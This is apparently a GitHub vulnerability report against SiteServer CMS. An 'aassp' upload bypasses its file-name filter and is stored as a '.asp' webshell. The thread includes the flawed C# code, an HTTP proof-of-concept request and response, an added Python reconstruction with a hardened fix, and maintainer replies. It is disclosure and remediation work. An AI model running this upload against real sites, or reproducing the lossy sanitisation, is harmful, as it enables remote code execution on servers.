
There is a vulnerability where an attacker can upload a file that bypasses the filtering rule to get a shell. #1858

Closed
diy0829 opened this issue Apr 12, 2019 · 4 comments

diy0829 commented Apr 12, 2019

After the administrator logs in and adds a new permitted file extension such as "aassp":


The administrator can upload a malicious file whose extension is "aassp".
After the file name has been passed through the filtering rule, the extension is changed to ".asp", and the file then runs as a webshell.

https://github.com/siteserver/cms/blob/dev/net452/SiteServer.CMS/Core/PathUtility.cs

```csharp
public static string GetUploadFileName(SiteInfo siteInfo, string filePath, bool isUploadChangeFileName)
{
    var retVal = isUploadChangeFileName
        ? $"{StringUtils.GetShortGuid(false)}{PathUtils.GetExtension(filePath)}"
        : PathUtils.GetFileName(filePath);

    // Lossy "sanitisation": every "as" (case-insensitive) and every ";" is deleted
    // from the whole file name, after the extension has already been accepted.
    retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);
    retVal = StringUtils.ReplaceIgnoreCase(retVal, ";", string.Empty);
    return retVal;
}

public static string GetUploadSpecialName(SiteInfo siteInfo, string filePath, bool isUploadChangeFileName)
{
    var retVal = isUploadChangeFileName
        ? $"{StringUtils.GetShortGuid(false)}{PathUtils.GetExtension(filePath)}"
        : PathUtils.GetFileName(filePath);

    // Same substitution as above, so the same "aassp" -> "asp" collapse applies here.
    retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);
    retVal = StringUtils.ReplaceIgnoreCase(retVal, ";", string.Empty);
    return retVal;
}
```

The filtering rule:

```csharp
retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);
```

The rule is so simple that it just replaces "as".

My suggestion is:

After the replacement, add a check to strengthen the filter: if "as" is still in the file extension, reject the upload.

POC:

```http
POST /siteserver/cms/modaluploadfile.aspx?PublishmentSystemID=1&uploadType=File&TextBoxClientID=FileUrl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1604917268667
Content-Length: 951

-----------------------------1604917268667
Content-Disposition: form-data; name="__EVENTTARGET"

btnSubmit
-----------------------------1604917268667
Content-Disposition: form-data; name="__EVENTARGUMENT"


-----------------------------1604917268667
Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwUJNjg4OTYyMzU3D2QWAgITD2QWAgIJDxBkDxYCZgIBFgIQBRvph4fnlKjns7vnu5/nlJ/miJDmlofku7blkI0FBFRydWVnEAUV6YeH55So5Y6f5pyJ5paH5Lu25ZCNBQVGYWxzZWdkZGRQ+LsLscytW1JgCPV76ln/lcczLM1kE1yuOcQDnYTmhQ==
-----------------------------1604917268667
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"

EAC6D450
-----------------------------1604917268667
Content-Disposition: form-data; name="hifUpload"; filename="1.aassp"
Content-Type: application/octet-stream

test

-----------------------------1604917268667
Content-Disposition: form-data; name="rblIsFileUploadChangeFileName"

True
-----------------------------1604917268667--
```

Part of the response (note the stored name now ends in ".asp"):

```html
if (parent.document.getElementById('FileUrl') != null)
{
    parent.document.getElementById('FileUrl').value = '@/upload/files/2019/4/131348846.asp';
}
if (window.parent.closeWindow) window.parent.closeWindow();if (window.parent.layer) window.parent.layer.closeAll();
  </script>
```

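To make the mechanism in the report concrete, here is an added example that is not code from the siteserver/cms project: a Python rendering of the quoted `GetUploadFileName` string handling, run end to end the way the report implies (the extension "aassp" passes the administrator's allow-list, then the lossy `"as"` substitution turns it into "asp"), next to a hardened version that validates the extension that will actually be stored and refuses script extensions whatever the allow-list says. Python is used because the flaw lives in the string manipulation, not in any .NET API. The allow-list entries other than "aassp", the list of script extensions, and all function names are assumptions for the demo.

```python
import os
import re
import secrets
from typing import Optional

# Constructed allow-list for the demo. Only "aassp" comes from the issue (the admin
# added it); the other entries are placeholders for whatever a site normally permits.
PERMITTED_EXTENSIONS = {"jpg", "png", "pdf", "aassp"}

# Extensions the web server hands to a script engine. Classic ASP's "asp" is the one
# the issue exercises; the rest is an assumed list, align it with your handler mappings.
SCRIPT_EXTENSIONS = {"asp", "aspx", "asa", "ashx", "asmx", "cshtml", "config"}


def is_permitted(file_path: str, permitted=PERMITTED_EXTENSIONS) -> bool:
    """Allow-list check on the extension the client sent, before any rewriting.
    The report implies this ordering: "aassp" was accepted and ".asp" was stored."""
    return os.path.splitext(file_path)[1].lower().lstrip(".") in permitted


def get_upload_file_name_vulnerable(file_path: str, change_name: bool) -> str:
    """Python rendering of the GetUploadFileName logic quoted in the issue: pick the
    name, then delete every "as" (case-insensitive) and every ";"."""
    ext = os.path.splitext(file_path)[1]
    name = secrets.token_hex(4) + ext if change_name else os.path.basename(file_path)
    name = re.sub("as", "", name, flags=re.IGNORECASE)  # "1.aassp" -> "1.asp"
    return name.replace(";", "")


def stored_extension_vulnerable(file_path: str, change_name: bool = True) -> Optional[str]:
    """The buggy pipeline end to end: allow-list first, lossy rewrite second.
    Returns the lower-cased extension that lands on disk, or None if rejected."""
    if not is_permitted(file_path):
        return None
    final_name = get_upload_file_name_vulnerable(file_path, change_name)
    return os.path.splitext(final_name)[1].lower()


def get_upload_file_name_hardened(file_path: str, permitted=PERMITTED_EXTENSIONS) -> str:
    """Added fix, not the project's: derive the final extension, validate *that*,
    refuse script extensions regardless of the admin's allow-list, and build the
    stored name from server-generated bytes only, so nothing needs stripping later."""
    ext = os.path.splitext(file_path)[1].lower().lstrip(".")
    if not re.fullmatch(r"[a-z0-9]{1,16}", ext):
        raise ValueError(f"extension {ext!r} is not a plain alphanumeric token")
    if ext in SCRIPT_EXTENSIONS:
        raise ValueError(f"extension {ext!r} is executable on this server")
    if ext not in permitted:
        raise ValueError(f"extension {ext!r} is not on the allow-list")
    name = f"{secrets.token_hex(8)}.{ext}"
    # Validate the name that will actually be written; any later rewrite would fail here.
    if os.path.splitext(name)[1].lstrip(".") != ext:
        raise RuntimeError("stored extension diverged from the validated one")
    return name


def hardened_rejects(file_path: str, permitted=PERMITTED_EXTENSIONS) -> bool:
    """True if the hardened path refuses the upload."""
    try:
        get_upload_file_name_hardened(file_path, permitted)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for sent in ("1.aassp", "x.aAsSp", "shell.asp"):
        print(f"{sent:12} vulnerable -> {stored_extension_vulnerable(sent)!s:6} "
              f"hardened rejects -> {hardened_rejects(sent)}")
```

The ordering is the whole point: the vulnerable pipeline decides on the extension and only afterwards mutates the name, so the decision no longer describes what is written. The hardened version never lets client-controlled bytes into the stored name (a random token plus the validated extension), which also makes the `";"` stripping unnecessary, and it refuses "asp" even when an administrator has added it to the allow-list, because the server's handler mappings, not a site setting, decide what executes.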

@starlying (Contributor)

The details of the bug are very clear. We will fix it in the next version. Thanks for your help.

@NicoleG25

@starlying was this issue ever addressed? And if so, could you point me to the fix?
Thanks!

@starlying (Contributor)

This issue is addressed; updating to the latest version will fix it.

@NicoleG25

@starlying, in which commit was the issue fixed?

Thanks in advance :)
